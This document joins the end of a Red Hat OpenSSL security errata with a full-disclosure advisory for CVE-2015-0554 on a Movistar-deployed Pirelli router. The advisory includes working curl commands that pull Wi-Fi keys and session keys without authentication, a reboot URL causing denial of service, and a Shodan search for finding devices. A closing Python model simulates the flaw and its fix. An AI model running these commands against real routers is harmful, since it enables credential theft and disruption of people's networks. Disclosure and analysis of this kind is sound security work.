openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
openssl-perl-1.0.1e-30.el6_6.5.i686.rpm
openssl-static-1.0.1e-30.el6_6.5.i686.rpm
x86_64:
openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm
openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
ppc64:
openssl-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-devel-1.0.1e-34.el7_0.7.ppc.rpm
openssl-devel-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-libs-1.0.1e-34.el7_0.7.ppc.rpm
openssl-libs-1.0.1e-34.el7_0.7.ppc64.rpm
s390x:
openssl-1.0.1e-34.el7_0.7.s390x.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm
openssl-devel-1.0.1e-34.el7_0.7.s390.rpm
openssl-devel-1.0.1e-34.el7_0.7.s390x.rpm
openssl-libs-1.0.1e-34.el7_0.7.s390.rpm
openssl-libs-1.0.1e-34.el7_0.7.s390x.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64:
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-perl-1.0.1e-34.el7_0.7.ppc64.rpm
openssl-static-1.0.1e-34.el7_0.7.ppc.rpm
openssl-static-1.0.1e-34.el7_0.7.ppc64.rpm
s390x:
openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm
openssl-perl-1.0.1e-34.el7_0.7.s390x.rpm
openssl-static-1.0.1e-34.el7_0.7.s390.rpm
openssl-static-1.0.1e-34.el7_0.7.s390x.rpm
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64:
openssl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-devel-1.0.1e-34.el7_0.7.i686.rpm
openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-libs-1.0.1e-34.el7_0.7.i686.rpm
openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm
openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm
openssl-static-1.0.1e-34.el7_0.7.i686.rpm
openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2014-3570
https://access.redhat.com/security/cve/CVE-2014-3571
https://access.redhat.com/security/cve/CVE-2014-3572
https://access.redhat.com/security/cve/CVE-2014-8275
https://access.redhat.com/security/cve/CVE-2015-0204
https://access.redhat.com/security/cve/CVE-2015-0205
https://access.redhat.com/security/cve/CVE-2015-0206
https://access.redhat.com/security/updates/classification/#moderate
https://www.openssl.org/news/secadv_20150108.txt
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201501-0227 | CVE-2015-0554 | ADB P.DGA4001N Vulnerability in obtaining important information in router firmware |
CVSS V2: 9.4 CVSS V3: - Severity: HIGH |
The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html. ADB (formerly known as Pirelli Broadband Solutions) P.DGA4001N is an ADSL wireless router product from ADB, Switzerland. The ADB P.DGA4001N router has a security vulnerability: its firmware fails to properly restrict access to the web interface.
Successful exploits may allow an attacker to bypass certain security restrictions and to perform unauthorized actions; this may aid in launching further attacks.
ADB P.DGA4001N Router running firmware PDG_TEF_SP_4.06L.6 is vulnerable; other versions may also be affected.
- Title:
CVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N remote information disclosure
HomeStation Movistar
- Author:
Eduardo Novella @enovella_
ednolo[@]inf.upv[dot]es
- Version:
Tested on firmware version PDG_TEF_SP_4.06L.6
- Shodan dork :
+ "Dropbear 0.46 country:es" (It no longer seems to work this way)
- Summary:
HomeStation Movistar has deployed routers manufactured by Pirelli. These routers are vulnerable: their HTML pages can be fetched from any
public IP address in the world. There is neither authentication nor any other protection to prevent unauthorized extraction of sensitive information.
- The vulnerability and the way to exploit it:
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_"
<option value='0'>WLAN_DEAD</option>
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey"
var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD';
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin"
var WscDevPin = '12820078';
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var sessionkey"
var sessionKey='1189641421';
$ curl -s http://${IP_ADDRESS}/wlcfg.html | grep -i "bssid:" -A 3
<td width="50">BSSID:</td>
<td>
DC:0B:1A:XX:XX:XX
</td>
# Rebooting the router remotely and provoking a Denial of Service
#-----------------------------------------------------------------
http://${IP_ADDRESS}/resetrouter.html
In the page source we can observe:
<!-- hide
var sessionKey='846930886';
function btnReset() {
var loc = 'rebootinfo.cgi?';
loc += 'sessionKey=' + sessionKey;
var code = 'location="' + loc + '"';
eval(code);
}
// done hiding -->
http://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123
# All the files we can fetch.
#----------------------------------------------
webs$ ls
adslcfgadv.html diagpppoe.html ipv6lancfg.html qoscls.html statsatmreset.html
adslcfgc.html dlnacfg.html js qosqmgmt.html statsifc.html
adslcfg.html dnscfg.html jsps qosqueueadd.html statsifcreset.html
adslcfgtone.html dnsproxycfg.html lancfg2.html qsmain.html statsmocalanreset.html
algcfg.html dsladderr.html languages quicksetuperr.html statsmocareset.html
APIS dslbondingcfg.html lockerror.html quicksetup.html statsmocawanreset.html
atmdelerr.html enblbridge.html logconfig.html quicksetuptesterr.html statsvdsl.html
backupsettings.html enblservice.html logintro.html quicksetuptestsucc.html statsvdslreset.html
berrun.html engdebug.html logobkg.gif rebootinfo.html statswanreset.html
berstart.html ethadderr.html logoc.gif resetrouter.html statsxtmreset.html
berstop.html ethdelerr.html logo_corp.gif restoreinfo.html storageusraccadd.html
certadd.html footer.html logo.html routeadd.html stylemain.css
certcaimport.html hlpadslsync.html logomenu.gif rtdefaultcfgerr.html threeGPIN.html
certimport.html hlpatmetoe.html main.html rtdefaultcfg.html todadd.html
certloadsigned.html hlpatmseg.html menuBcm.js scdmz.html tr69cfg.html
cfgatm.html hlpethconn.html menu.html scinflt.html updatesettings.html
cfgeth.html hlppngdns.html menuTitle.js scmacflt.html upload.html
cfgl2tpac.html hlppnggw.html menuTree.js scmacpolicy.html uploadinfo.html
cfgmoca.html hlppppoasess.html mocacfg.html scoutflt.html upnpcfg.html
cfgptm.html hlppppoeauth.html multicast.html scprttrg.html url_add.html
colors.css hlppppoeconn.html natcfg2.html scripts util.js
config.json.txt hlppppoeip.html ntwksum2.html scvrtsrv.html wanadderr.html
css hlptstdns.html omcidownload.html seclogintro.html wancfg.html
ddnsadd.html hlpusbconn.html omcisystem.html snmpconfig.html wlcfgadv.html
defaultsettings.html hlpwlconn.html password.html sntpcfg.html wlcfg.html
dhcpinfo.html html portmapadd.html standby.html wlcfgkey.html
diag8021ag.html ifcdns.html portmapedit.html StaticIpAdd.html wlmacflt.html
diagbr.html ifcgateway.html portName.js StaticIpErr.html wlrefresh.html
diag.html images pppoe.html statsadslerr.html wlsecurity.html
diagipow.html index.html pradd.html statsadsl.html wlsetup.html
diaglan.html info.html ptmadderr.html statsadslreset.html wlwapias.html
diagmer.html ipoacfg.html ptmdelerr.html statsatmerr.html xdslcfg.html
diagpppoa.html ippcfg.html pwrmngt.html statsatm.html
+ Conclusion:
This vulnerability can be exploited remotely and it should be patched as soon as possible. An attacker could be monitoring our network
or, even worse, we could be members of a botnet without knowing it.
A first mitigation would be either to update these routers to the latest firmware version or to install third-party firmware such as OpenWRT or DD-WRT on them.
+ References:
http://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Router-ASL-26555-Password-Disclosure.html
+ Timeline:
2013-04-xx Send email to Movistar and Pirelli
2015-01-05 Full disclosure
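Added example, not from the advisory above and not ADB's firmware: a constructed Python model of the root cause. The page-embedded sessionKey that rebootinfo.cgi checks only proves the caller has seen resetrouter.html, so it is worthless when that page itself is served without a login; the hardened mode authenticates first and binds the key to the session. The class, the credentials and the PSK value are assumptions made for the example.

```python
import re
import secrets
from urllib.parse import parse_qs

# Pages named in the advisory: they expose WLAN secrets or reboot the device.
SENSITIVE = ("/wlsecurity.html", "/resetrouter.html", "/rebootinfo.cgi")
WPA_PSK = "constructed-psk-not-a-real-key"   # constructed sample secret

class RouterUI:
    """Constructed model of a router web UI whose pages embed a sessionKey.
    require_login=False reproduces the reported behaviour; True is the fix."""

    def __init__(self, require_login):
        self.require_login = require_login
        self.sessions = {}               # session cookie -> sessionKey bound to it
        self.anon_key = "846930886"      # key the vulnerable UI prints to anyone

    def login(self, user, password):
        if (user, password) != ("admin", "constructed-admin-pw"):  # assumed creds
            return None
        cookie = secrets.token_hex(16)
        self.sessions[cookie] = secrets.token_hex(8)  # per-session anti-CSRF key
        return cookie

    def get(self, path, query="", cookie=None):
        if path not in SENSITIVE:
            return 404, ""
        if self.require_login:           # hardened: authenticate before anything else
            if cookie not in self.sessions:
                return 401, "login required"
            key = self.sessions[cookie]
        else:                            # vulnerable: no authentication at all
            key = self.anon_key
        if path == "/wlsecurity.html":
            return 200, f"var wpaPskKey = '{WPA_PSK}';\nvar sessionKey='{key}';"
        if path == "/resetrouter.html":
            return 200, f"var sessionKey='{key}';"
        # /rebootinfo.cgi: the key is accepted from whoever saw the page above.
        sent = parse_qs(query).get("sessionKey", [""])[0]
        return (200, "rebooting") if sent == key else (403, "bad sessionKey")

def anonymous_walkthrough(ui):
    """Replays the advisory's request sequence against the model with no cookie."""
    status, body = ui.get("/wlsecurity.html")
    leaked = status == 200 and WPA_PSK in body
    status, body = ui.get("/resetrouter.html")
    m = re.search(r"sessionKey='([^']+)'", body)
    if m:
        status, _ = ui.get("/rebootinfo.cgi", f"sessionKey={m.group(1)}")
    return {"psk_leaked": leaked, "reboot_status": status}
```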